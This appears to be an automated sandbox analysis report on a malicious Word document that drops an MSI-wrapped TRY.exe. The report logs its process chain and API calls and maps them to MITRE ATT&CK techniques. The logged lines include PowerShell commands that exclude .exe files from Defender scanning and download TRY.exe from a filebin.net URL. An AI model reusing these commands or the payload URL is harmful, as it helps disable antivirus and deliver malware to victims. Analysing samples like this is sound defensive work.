Source: C:\Windows\System32\cmd.exe; Console Write: ...................J....................................@c!J..... .......#...............(:w.......J....."..............T.......q(.w............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ........................#.................r...............r.......m.....`Io.......bw.....................Kv.....................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w....#...............V.yk......w...............S.............}.dw.... .w.....0.~...............Z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w..../...............6.yk......Z...............S.............}.dw......w.....0.~.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w..../...............V.yk......w...............S.............}.dw.... .w.....0.~...............Z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w....;...............6.yk......................S.............}.dw......w.....0.~.....................|.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w....;...............V.yk....8.w...............S.............}.dw......w.....0.~...............Z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w....G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.S.............}.dw......w.....0.~.............H.Z.....".......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w....G...............V.yk......w...............S.............}.dw......w.....0.~...............Z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w....S...............6.yk......Z...............S.............}.dw....0.w.....0.~.....................b.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w....S...............V.yk......w...............S.............}.dw....h.w.....0.~...............Z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w...._...............6.yk......Z...............S.............}.dw....0.w.....0.~.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w...._...............V.yk......w...............S.............}.dw....h.w.....0.~...............Z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w....k....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.dw......w.....0.~.............H.Z.....2.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w....k...............V.yk....P.w...............S.............}.dw......w.....0.~...............Z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w....w...............6.yk......Z...............S.............}.dw......w.....0.~.....................l.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w....w...............V.yk......w...............S.............}.dw....H.w.....0.~...............Z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w............ .......6.yk......Z...............S.............}.dw......w.....0.~.............H.Z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w....................V.yk......w...............S.............}.dw......w.....0.~...............Z.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ........................#.................j...............j.......e.....`Ig.......bw.....................Kn.....................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w....#...............6.ok......t.............................}.dw......t.....0.................L.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w..../.................ok......L.............................}.dw....`.t.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w..../...............6.ok......t.............................}.dw......t.....0.................L.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w....;.................ok......L.............................}.dw......t.....0.......................~.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w....;...............6.ok......t.............................}.dw....8.t.....0.................L.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.8...............}.dw....H.t.....0...............h.L.....".......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G...............6.ok......t.............................}.dw......t.....0.................L.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S.................ok......L.............................}.dw....H.t.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............6.ok......t.............................}.dw......t.....0.................L.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._.......T.R.Y...e.x.e.....L.............................}.dw....0.t.....0...............h.L.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._...............6.ok......t.............................}.dw....h.t.....0.................L.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k.................ok......L.............................}.dw....0.t.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k...............6.ok......t.............................}.dw....h.t.....0.................L.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w....... . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.......t.....0...............h.L.....4.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w...............6.ok....P.t.............................}.dw......t.....0.................L.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................ok......L.............................}.dw......t.....0.......................l.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................6.ok......t.............................}.dw....H.t.....0.................L.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .........ok......L.............................}.dw......t.....0...............h.L.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................6.ok......t.............................}.dw......t.....0.................L.............................
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding A7515E85DB42A85129F32A151C15AD96
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe"
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe Process created: C:\Windows\System32\cmd.exe cmd /c thai.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Set-MpPreference -ExclusionExtension ".exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe"
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\." /SETINTEGRITYLEVEL (CI)(OI)LOW
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe Code function: 9_2_000000013FB61B44 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,
Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc OLE indicator, Word Document stream: true
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$543_0008858249_FWDOUTSTANDING_20200604.doc
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVR582D.tmp
Source: classification engine Classification label: mal76.expl.winDOC@19/23@5/2
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe Code function: 9_2_000000013FB665B0 GetCurrentDirectoryA,SetCurrentDirectoryA,GetLastError,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,GetLastError,FormatMessageA,SetCurrentDirectoryA,
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe Code function: 9_2_000000013FB64478 CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,GetLastError,FormatMessageA,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe Code function: 9_2_000000013FB65940 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,#20,#22,#23,FreeResource,SendMessageA,
Source: C:\Windows\SysWOW64\msiexec.exe File written: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\msiwrapper.ini
Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc OLE document summary: title field not present or empty
Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc OLE document summary: author field not present or empty
Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc OLE document summary: edited time not present or 0
Source: ~WRF{1B1DF0C8-9DAA-4EF5-BAF3-5F56FA2C5B3B}.tmp.0.dr OLE document summary: title field not present or empty
Source: ~WRF{1B1DF0C8-9DAA-4EF5-BAF3-5F56FA2C5B3B}.tmp.0.dr OLE document summary: author field not present or empty
Source: ~WRF{1B1DF0C8-9DAA-4EF5-BAF3-5F56FA2C5B3B}.tmp.0.dr OLE document summary: edited time not present or 0
Source: ~DFC2FF7A9553E7F48E.TMP.0.dr OLE document summary: title field not present or empty
Source: ~DFC2FF7A9553E7F48E.TMP.0.dr OLE document summary: author field not present or empty
Source: ~DFC2FF7A9553E7F48E.TMP.0.dr OLE document summary: edited time not present or 0
Source: MSI5B5A.tmp.2.dr OLE document summary: edited time not present or 0
Source: 535fae.ipi.2.dr OLE document summary: title field not present or empty
Source: 535fae.ipi.2.dr OLE document summary: author field not present or empty
Source: 535fae.ipi.2.dr OLE document summary: edited time not present or 0
Source: C:\Windows\System32\msiexec.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: MSI5B5A.tmp.2.dr Initial sample: OLE summary template = Intel;1033
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wextract.pdb source: TRY.exe, 00000009.00000000.925012433.000000013FB69000.00000002.00000001.01000000.00000005.sdmp, TRY.exe, 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp, 79bd875a22ddb24abfa2594fbd40eccf.tmp.7.dr, MSI5B5A.tmp.2.dr, files.cab.4.dr
Source: Binary string: wextract.pdbGCTL source: TRY.exe, 00000009.00000000.925012433.000000013FB69000.00000002.00000001.01000000.00000005.sdmp, TRY.exe, 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp, 79bd875a22ddb24abfa2594fbd40eccf.tmp.7.dr, MSI5B5A.tmp.2.dr, files.cab.4.dr
Source: Binary string: C:\ss2\Projects\MsiWrapper\MsiCustomActions\Release\MsiCustomActions.pdb source: MSI5B5A.tmp.2.dr, MSI9F1.tmp.2.dr
Source: MSI5B5A.tmp.2.dr Initial sample: OLE summary keywords = Installer
Source: MSI5B5A.tmp.2.dr Initial sample: OLE summary subject = Internet Explorer - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com
Source: ~WRF{1B1DF0C8-9DAA-4EF5-BAF3-5F56FA2C5B3B}.tmp.0.dr Initial sample: OLE indicators vbamacros = False
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe Code function: 9_2_000000013FB61C38 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,
Source: C:\Windows\SysWOW64\expand.exe File created: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe (copy)
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI9F1.tmp
Source: C:\Windows\SysWOW64\expand.exe File created: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\$dpx$.tmp\79bd875a22ddb24abfa2594fbd40eccf.tmp
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe Code function: 9_2_000000013FB615F8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,
Source: C:\Windows\SysWOW64\expand.exe File created: C:\Windows\Logs\DPX\setupact.log
Source: C:\Windows\SysWOW64\expand.exe File created: C:\Windows\Logs\DPX\setuperr.log
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0
Source: C:\Windows\System32\msiexec.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\System32\msiexec.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe TID: 2416 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1424 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\cmd.exe TID: 2476 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1684 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2532 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\msiexec.exe Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe Code function: 9_2_000000013FB65E4C GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,GetLastError,
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe Code function: 9_2_000000013FB61F00 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe Code function: 9_2_000000013FB61C38 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe Code function: 9_2_000000013FB67F40 SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe Code function: 9_2_000000013FB67C44 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding A7515E85DB42A85129F32A151C15AD96
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe"
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\." /SETINTEGRITYLEVEL (CI)(OI)LOW
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe Process created: C:\Windows\System32\cmd.exe cmd /c thai.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Set-MpPreference -ExclusionExtension ".exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe"
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe Code function: 9_2_000000013FB612C0 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe Code function: 9_2_000000013FB68114 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe Code function: 9_2_000000013FB629E4 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,
MITRE ATT&CK matrix columns, in order: Initial Access; Execution; Persistence; Privilege Escalation; Defense Evasion; Credential Access; Discovery; Lateral Movement; Collection; Exfiltration; Command and Control; Network Effects; Remote Service Effects; Impact
Matrix rows (cells in column order; a leading number is the count shown in that cell):
Row 1: 1 Replication Through Removable Media; 21 Scripting; 1 Registry Run Keys / Startup Folder; 1 Access Token Manipulation; 21 Scripting; OS Credential Dumping; 1 System Time Discovery; 1 Replication Through Removable Media; 1 Archive Collected Data; Exfiltration Over Other Network Medium; 2 Ingress Tool Transfer; Eavesdrop on Insecure Network Communication; Remotely Track Device Without Authorization; 1 System Shutdown/Reboot
Row 2: Default Accounts; 2 Native API; 1 Services File Permissions Weakness; 11 Process Injection; 1 File Deletion; LSASS Memory; 11 Peripheral Device Discovery; Remote Desktop Protocol; Data from Removable Media; Exfiltration Over Bluetooth; 21 Encrypted Channel; Exploit SS7 to Redirect Phone Calls/SMS; Remotely Wipe Data Without Authorization; Device Lockout
Row 3: Domain Accounts; 3 Exploitation for Client Execution; Logon Script (Windows); 1 Registry Run Keys / Startup Folder; 21 Masquerading; Security Account Manager; 4 File and Directory Discovery; SMB/Windows Admin Shares; Data from Network Shared Drive; Automated Exfiltration; 2 Non-Application Layer Protocol; Exploit SS7 to Track Device Location; Obtain Device Cloud Backups; Delete Device Data
Row 4: Local Accounts; 1 Command and Scripting Interpreter; Logon Script (Mac); 1 Services File Permissions Weakness; 1 Modify Registry; NTDS; 17 System Information Discovery; Distributed Component Object Model; Input Capture; Scheduled Transfer; 3 Application Layer Protocol; SIM Card Swap; Carrier Billing Fraud
Row 5: Cloud Accounts; Cron; Network Logon Script; Network Logon Script; 21 Virtualization/Sandbox Evasion; LSA Secrets; 1 Query Registry; SSH; Keylogging; Data Transfer Size Limits; Fallback Channels; Manipulate Device Communication; Manipulate App Store Rankings or Ratings
Row 6: Replication Through Removable Media; Launchd; Rc.common; Rc.common; 1 Access Token Manipulation; Cached Domain Credentials; 1 Process Discovery; VNC; GUI Input Capture; Exfiltration Over C2 Channel; Multiband Communication; Jamming or Denial of Service; Abuse Accessibility Features
Row 7: External Remote Services; Scheduled Task; Startup Items; Startup Items; 11 Process Injection; DCSync; 21 Virtualization/Sandbox Evasion; Windows Remote Management; Web Portal Capture; Exfiltration Over Alternative Protocol; Commonly Used Port; Rogue Wi-Fi Access Points; Data Encrypted for Impact
Row 8: Drive-by Compromise; Command and Scripting Interpreter; Scheduled Task/Job; Scheduled Task/Job; 1 Services File Permissions Weakness; Proc Filesystem; 1 Remote System Discovery; Shared Webroot; Credential API Hooking; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Application Layer Protocol; Downgrade to Insecure Protocols; Generate Fraudulent Advertising Revenue
Row 9: Exploit Public-Facing Application; PowerShell; At (Linux); At (Linux); 1 Rundll32; /etc/passwd and /etc/shadow; System Network Connections Discovery; Software Deployment Tools; Data Staged; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Web Protocols; Rogue Cellular Base Station; Data Destruction
Behavior Graph ID: 611840; Sample: 12543_0008858249_FWDOUTSTAN...; Startdate: 20/04/2022; Architecture: WINDOWS; Score: 76
Signatures shown on the graph: Multi AV Scanner detection for domain / URL; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 3 other signatures
